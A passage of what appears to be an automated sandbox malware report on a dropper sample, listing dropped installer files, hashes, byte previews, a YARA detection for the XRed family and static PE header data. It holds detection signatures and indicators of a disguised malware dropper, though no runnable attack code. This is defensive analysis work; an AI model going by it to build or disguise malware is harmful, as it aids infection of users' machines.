Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch13\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f13\fbidi \fnil\fcharset134\fprq2{\\panose 00000000000000000000}SimSun{\\falt ???\'a1\'ec??};}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}{\f42\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0603020202020204}Trebuchet MS{\\falt Arial};}..{\f43\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0604030504040204}Tahoma{\\falt ?l?r ???};}{\f45\fbidi \fnil\fcharset134\fprq2{\*\

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\2052\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	2978
Entropy (8bit):	6.135205733555905
Encrypted:	false
SSDEEP:	48:c5DiTlOtKesi+hDtkQf7lz+W0gopN3m5+3cNONeN1ra8vWqPtlTKxKUTKlKXRoR+:uDiTlV5kQR9GLeE0ZxV6gIV
MD5:	3D1E15DEEACE801322E222969A574F17
SHA1:	58074C83775E1A884FED6679ACF9AC78ABB8A169
SHA-256:	2AC8B7C19A5189662DE36A0581C90DBAD96DF259EC00A28F609B644C3F39F9CA
SHA-512:	10797919845C57C5831234E866D730EBD13255E5BF8BA8087D53F1D0FC5D72DC6D5F6945DBEBEE69ACC6A2E20378750C4B78083AE0390632743C184532358E10
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">......</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [..] - .......... ..................Install ........../passive \| /quiet - ..... UI ......... UI ... ........ UI ........../norestart - ..................... UI.../log log.txt - ............. %TEMP% ...

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\3082\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	138675
Entropy (8bit):	5.050625173520788
Encrypted:	false
SSDEEP:	1536:xZaJh2CRnUIsoewkrij8GdsG0cnucUGfr1h9B:/isoewIMucUeb
MD5:	CCAFB1E1899D9978AA5CA91DFFBE38BC
SHA1:	D3F8D0E104EE05D75657D0E0EA57AE00E80415AA
SHA-256:	445C75CE126F942A1D4B84CE1752F796394EAED74EBEB8862564A1E06E61DB7C
SHA-512:	5639A9A00A9D6BB98D3C05CCB16EB2428C869C3003F733F00908B138D614D7407BD6C15359F7DAF6F719A534F51B5C638FDCF744913641B4367090A1AB0B252F
Malicious:	false
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\\panose 00000000000000000000}SimSun{\\falt ??\'a1\'a7??};}{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}..{\f42\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0603020202020204}Trebuchet MS{\\falt Arial};}{\f43\fbidi \fswiss\fchars

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\3082\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	dropped
Size (bytes):	3265
Entropy (8bit):	5.0491645049584655
Encrypted:	false
SSDEEP:	48:c5DiTlO/esS6VGhDv4tiUiyRUqzC4U+aD6N3m7xNh1NWNGbPz+9o3PWeKK9K9KfT:uDiTlxouUTiySqyIwz9sgxqvjIk8
MD5:	47F9F8D342C9C22D0C9636BC7362FA8F
SHA1:	3922D1589E284CE76AB39800E2B064F71123C1C5
SHA-256:	9CBB2B312C100B309A1B1495E84E2228B937612885F7A642FBBD67969B632C3A
SHA-512:	E458DF875E9B0622AEBE3C1449868AA6A2826A1F851DB71165A872B2897CF870CCF85046944FF51FFC13BB15E54E9D9424EC36CAF5A2F38CE8B7D6DC0E9B2363
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalaci.n de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.Est. seguro de que desea cancelar la operaci.n?</String>.. <String Id="HelpHeader">Ayuda de configuraci.n</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - instala, repara, desinstala o.. crea una copia local completa del paquete en el directorio. La opci.n predeterminada es la instalaci.n...../passive \| /quiet - muestra una IU m.nima sin solicitudes o no muestra ninguna IU ni.. solicitud. De forma predeterminada, se muestran la IU y todas las solicitudes...../norestart - elimina cualquier intento

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\BootstrapperApplicationData.xml

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (562), with CRLF line terminators
Category:	dropped
Size (bytes):	12366
Entropy (8bit):	3.723649926726667
Encrypted:	false
SSDEEP:	192:X001Ks1tDn6z6Q60686760660r6p6vpsxLUV/qzLG0LrBx7z8NkzzkvQroBL5LY8:XPIseWq/2JOVEpcE+
MD5:	FD91EFD2D1CD5CA91B4CF3CD1DAA6DF4
SHA1:	802B2536838EAEB275CD11BD9D13304D49057DBE
SHA-256:	3B21CFF05E9A87C320E13C519C30BC3EE435A66E36D5B3B504616AC6536B03DB
SHA-512:	CA674F140CDA719F9F5E98863146CFFE30879951F738B676A2B6E70CAF266168DA63894BE905D380F0A07023096FF23DBEC7502EAFF52D3A54F9E5B07FCAE2DC
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.U.x.B.l.o.c.k.e.r. .S.h.o.r.t.N.a.m.e.=.".M.i.n.i.m.u.m.O.S.L.e.v.e.l.". .T.y.p.e.=.".S.t.o.p.". .C.o.n.d.i.t.i.o.n.=.".N.O.T.(.(.V.e.r.s.i.o.n.N.T. .&.g.t.;. .v.6...1.). .O.R. .(.V.e.r.s.i.o.n.N.T. .=. .v.6...1. .A.N.D. .S.e.r.v.i.c.e.P.a.c.k.L.e.v.e.l. .&.g.t.;.=. .1.).).". .D.i.s.p.l.a.y.T.e.x.t.=.".#.l.o.c...M.i.n.i.m.u.m.O.S.L.e.v.e.l.". ./.>..... . .<.W.i.x.B.a.l.C.o.n.d.i.t.i.o.n. .C.o.n.d.i.t.i.o.n.=.".V.e.r.s.i.o.n.N.T.6.4. .&.g.t.;.=. .v.6...0. .O.R. .(.V.e.r.s.i.o.n.N.T.6.4. .=. .v.5...2. .A.N.D. .S.e.r.v.i.c.e.P.a.c.k.L.e.v.e.l. .&.g.t.;.=. .1.).". .M.e.s.s.a.g.e.=.".[.W.i.x.B.u.n.d.l.e.N.a.m.e.]. .c.a.n. .o.n.l.y. .b.e. .i.n.s.t.a.l.l.e.d. .o.n. .W.i.n.d.o.w.s. .X.P. .S.P.1. .(.

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\license.rtf

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	142004
Entropy (8bit):	5.042612450073146
Encrypted:	false
SSDEEP:	1536:2qLS0+8sRBvILvx4XiV6lAqLv4Bu02Zqh9L:FoOuXiJ5N
MD5:	092265AFE935B7D94FE789DC3D6B909A
SHA1:	84FBFBC671B25E1FC96E3657D0AACDDDC911BB09
SHA-256:	EBD4C9D474FF626294466196E754BDD2190D7528C74EF02080EDDBEEC5BF4744
SHA-512:	D86A09B44424D83FB6CBB9FD8E61D776C4115EC9D6363E68B1339F6377E1ADEFDA46E4115D97663775B2ECD377AFB4E5C4D10B3C651D9771B347C1828F9050B1
Malicious:	false
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff43\deff0\stshfdbch11\stshfloch0\stshfhich0\stshfbi0\deflang1033\deflangfe1033\themelang1033\themelangfe2052\themelangcs1025{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 00000000000000000000}Times New Roman{\\falt Times};}..{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New{\\falt Arial};}{\f3\fbidi \froman\fcharset2\fprq2{\\panose 05050102010706020507}Symbol{\\falt Bookshelf Symbol 3};}..{\f10\fbidi \fnil\fcharset2\fprq2{\\panose 05000000000000000000}Wingdings{\\falt Symbol};}{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt ?l?r ??\'81\'66c};}..{\f13\fbidi \fnil\fcharset134\fprq2{\\panose 00000000000000000000}SimSun{\\falt ???????????????????????????????};}{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math{\\falt Calisto MT};}..{\f42\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0603020202020204}Trebuchet MS{\\falt Arial};}{\f43\f

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\logo.png

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	PNG image data, 64 x 64, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1861
Entropy (8bit):	6.868587546770907
Encrypted:	false
SSDEEP:	24:q36cnTKM/3kTIQiBmYKHeQWalGt1Sj9kYIt1uZ+bYOQe0IChR95aW:qqiTKMPuUBm7eQJGtYJM1uZCVszaW
MD5:	D6BD210F227442B3362493D046CEA233
SHA1:	FF286AC8370FC655AEA0EF35E9CF0BFCB6D698DE
SHA-256:	335A256D4779EC5DCF283D007FB56FD8211BBCAF47DCD70FE60DED6A112744EF
SHA-512:	464AAAB9E08DE610AD34B97D4076E92DC04C2CDC6669F60BFC50F0F9CE5D71C31B8943BD84CEE1A04FB9AB5BBED3442BD41D9CB21A0DD170EA97C463E1CE2B5B
Malicious:	false
Preview:	.PNG........IHDR...@...@.............sRGB.........gAMA......a.....PLTE].q^.r_.r_.s`.s`.s`.ta.ta.ub.ub.vc.vd.vd.vd.we.we.xe.xg.yg yg zh zh"zi"{j#\|i${j$\|n~n.n,.o,.p..q0.r2.s3.t5.x;.x<.y>.z?.\|B.~C.}E..F..F..H..I..J..L..O..P..W..Y..^..a..c..g..i..q..r..}.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................S......pHYs..%...%....^.....tEXtSoftware.Paint.NET v3.5.100.r.....IDATXG..iW.@...EJ.$M...`AEpG..7TpWT@\.."....(..(.._;...di:9.c>q..g....T...._...-....F..+..w.

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\thm.wxl

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2952
Entropy (8bit):	5.052095286906672
Encrypted:	false
SSDEEP:	48:c5DiTl/+desK19hDUNKwsqq8+JIDxN3mt7NlN1NVvAdMcgLPDHVXK8KTKjKnSnYF:uDiTl/BbTxmup/vrxATd
MD5:	FBFCBC4DACC566A3C426F43CE10907B6
SHA1:	63C45F9A771161740E100FAF710F30EED017D723
SHA-256:	70400F181D00E1769774FF36BCD8B1AB5FBC431418067D31B876D18CC04EF4CE
SHA-512:	063FB6685EE8D2FA57863A74D66A83C819FE848BA3072B6E7D1B4FE397A9B24A1037183BB2FDA776033C0936BE83888A6456AAE947E240521E2AB75D984EE35E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29" />.... <String Id="Caption">[WixBundleName] Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Are you sure you want to cancel?</String>.. <String Id="HelpHeader">Setup Help</String>.. <String Id="HelpText">/install \| /repair \| /uninstall \| /layout [directory] - installs, repairs, uninstalls or.. creates a complete local copy of the bundle in directory. Install is the default...../passive \| /quiet - displays minimal UI with no prompts or displays no UI and.. no prompts. By default UI and all prompts are displayed...../norestart - suppress any attempts to restart. By default UI will prompt before restart.../log log.txt - logs to a specific file. B

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\thm.xml

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5881
Entropy (8bit):	5.175177119212422
Encrypted:	false
SSDEEP:	96:wHdQG+3VzHfz96zYFJKFBiUxn7s82rf3nswO:wHAz8
MD5:	0056F10A42638EA8B4BEFC614741DDD6
SHA1:	61D488CFBEA063E028A947CB1610EE372D873C9F
SHA-256:	6B1BA0DEA830E556A58C883290FAA5D49C064E546CBFCD0451596A10CC693F87
SHA-512:	5764EC92F65ACC4EBE4DE1E2B58B8817E81E0A6BC2F6E451317347E28D66E1E6A3773D7F18BE067BBB2CB52EF1FA267754AD2BF2529286CF53730A03409D398E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<Theme xmlns="http://wixtoolset.org/schemas/thmutil/2010">.. <Window Width="485" Height="300" HexStyle="100a0000" FontId="0">#(loc.Caption)</Window>.. <Font Id="0" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="1" Height="-24" Weight="500" Foreground="000000">Segoe UI</Font>.. <Font Id="2" Height="-22" Weight="500" Foreground="666666">Segoe UI</Font>.. <Font Id="3" Height="-12" Weight="500" Foreground="000000" Background="FFFFFF">Segoe UI</Font>.. <Font Id="4" Height="-12" Weight="500" Foreground="ff0000" Background="FFFFFF" Underline="yes">Segoe UI</Font>.... <Image X="11" Y="11" Width="64" Height="64" ImageFile="logo.png" Visible="yes"/>.. <Text X="80" Y="11" Width="-11" Height="64" FontId="1" Visible="yes" DisablePrefix="yes">#(loc.Title)</Text>.... <Page Name="Help">.. <Text X="11" Y="80" Width="-11" Height="30" FontId="2" DisablePrefix="yes">#(loc.HelpHeader)</T

C:\Users\user\AppData\Local\Temp\{80586c77-db42-44bb-bfc8-7aebbb220c00}\.ba1\wixstdba.dll

Download File

Process:	C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	130032
Entropy (8bit):	6.426086637346382
Encrypted:	false
SSDEEP:	1536:vw7WzpopAuJhsVuThs5cXyeM6JUOfPGSpeBxm946ITADDwYkH/1d9chyP7iN6p0x:RmAuJhAyZFpem90iw//1d9chwG62MG
MD5:	A973CFA4951D519E032F42DC98A198B0
SHA1:	2BA0F1E1570BC2D84F9824D58E77B9192EA5DD94
SHA-256:	25EE85C14C9BE619B4F0BF783963ACE1DC0AF0E802014728C2A2CA8DA213D31D
SHA-512:	B4A8C4F08A51BDD9CE7708FE8E2477182A52F1D853954EB5AF0430C2DF99839B6076A7D93B00391A73D446A6AD9DA3ED77EF79C8B23353D32C72FC540415B8EF
Malicious:	false
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: NotezillaSetup.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................x=....x...... .....0.....n..x.....x8....x9....x>...Rich..........................PE..L....NjT...........!.....4...................P...............................0...........@.............................................l................#...... ...0S.................................@............P...............................text....2.......4.................. ..`.rdata...d...P...f...8..............@..@.data..../..........................@....rsrc...l...........................@..@.reloc..J ......."..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~$4bzU9tWE.xlsm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:KVC+cAmltV:KVC+cR
MD5:	9C7132B2A8CABF27097749F4D8447635
SHA1:	71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
SHA-256:	7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
SHA-512:	333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
Malicious:	false
Preview:	.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\~DF5CBF9C8F6D96E5F6.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.746897789531007
Encrypted:	false
SSDEEP:	192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
MD5:	7426F318A20A187D88A6EC88BBB53BAF
SHA1:	4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
SHA-256:	9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
SHA-512:	EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\._cache_LisectAVT_2403002A_282.exe

Download File

Process:	C:\Users\user\Desktop\LisectAVT_2403002A_282.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15244952
Entropy (8bit):	7.996729315290779
Encrypted:	true
SSDEEP:	196608:k7flpQcIIS/Rj7BWl+aV8t8z72BxBwBgO4n6018xRrdVBzIxdAANm5suXf/BApek:alptVYmfr7yBG/4nF8TRVBsViHmpe
MD5:	1BD671CE0DEAAA901841AE87D92B3606
SHA1:	6E0CFCDD9090587C5AFFA1DC6FEED782378D34E7
SHA-256:	9ABF3A1386584EA0E4B31198CC56E988E13E67CCDB1137EC6E18E883753D2DDB
SHA-512:	764DD2B3C0C8BE6AC6000CD40D8838F763282869F3B558FFF75100E5C46B03FB629DA99B4C1005822772D7DA1C42AF669D49FADF0AC7819285CF10B64D965CC7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-.}}~.}}~.}}~...~.}}~...~.}}~...~.}}~...~.}}~.}\|~.\|}~...~.}}~...~.}}~.}.~.}}~...~.}}~Rich.}}~........PE..L....S.T.....................6....................@..........................P......p.....@..................................6..@........9..........0`..h>......03.. .......................H/......./..@............................................text............................... ..`.rdata.............................@..@.data....0...`.......:..............@....wixburn8............J..............@..@.tls.................L..............@....rsrc....9.......:...N..............@..@.reloc...D.......F..................@..B................................................................................................................................................................................................................................................

C:\Users\user\Documents\DVWHKMNFNN\WUTJSCBCFX.xlsm

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\Documents\DVWHKMNFNN\~$WUTJSCBCFX.xlsx

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:KVC+cAmltV:KVC+cR
MD5:	9C7132B2A8CABF27097749F4D8447635
SHA1:	71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
SHA-256:	7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
SHA-512:	333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
Malicious:	false
Preview:	.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Documents\DVWHKMNFNN\~$cache1

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	771584
Entropy (8bit):	6.636362882247521
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IFr:ansJ39LyjbJkQFMhmC+6GD92
MD5:	B753207B14C635F29B2ABF64F603570A
SHA1:	8A40E828224F22361B09494A556A20DB82FC97B9
SHA-256:	7F16106F3354A65FC749737905B77DF7BBEFA28BF8BBC966DC1F8C53FA4660F2
SHA-512:	0DD32803B95D53BADD33C0C84DF1002451090FF5F74736680E3A53A0BFC0E723EEE7D795626BC10A1FB431DE7E6E276C5A66349EF385A8B92B48425B0BDD036F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\DVWHKMNFNN\~$cache1, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.981074181960188
TrID:	Win32 Executable (generic) a (10002005/4) 92.57% Win32 Executable Borland Delphi 7 (665061/41) 6.16% Windows ActiveX control (116523/4) 1.08% Win32 Executable Delphi generic (14689/80) 0.14% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	LisectAVT_2403002A_282.exe
File size:	16'016'392 bytes
MD5:	6d1fd0af6dd71b3ca81ecefb1d9f9324
SHA1:	7dce009fae200ad379a332bc4f2cc5dc8c88df52
SHA256:	43c1d24d64d652dba7a789b4eb06870d5ba199060f0069b906a7b0f9ecbd4d70
SHA512:	9847db8a749bf940424c4e5ae8f29c459fe96aa88b95e066f53ad840a618ab9190de3797a1116839ad2be3db6c973675190e5e049cca6dad004115d54c5fb599
SSDEEP:	196608:ULz7flpQcIIS/Rj7BWl+aV8t8z72BxBwBgO4n6018xRrdVBzIxdAANm5suXf/BAn:UTlptVYmfr7yBG/4nF8TRVBsViHmpe
TLSH:	38F63332F6C08037C676093A9C5AE3645D3ABA152F34695B77E85E0D1F3D38329B6293
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Static PE Info

General

Entrypoint:	0x49ab80
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	332f7ce65ead0adfb3d35147033aabe9

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0049A778h
call 00007F95A510E1DDh
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
call 00007F95A5161B25h
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
mov edx, 0049ABE0h
call 00007F95A5161724h
mov ecx, dword ptr [0049DBDCh]
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
mov edx, dword ptr [00496590h]
call 00007F95A5161B14h
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
call 00007F95A5161B88h
call 00007F95A510BCBBh
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa0000	0x2a42	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb0000	0xe9bbc8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa5000	0xa980	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0xa4018	0x21	.rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xa4000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
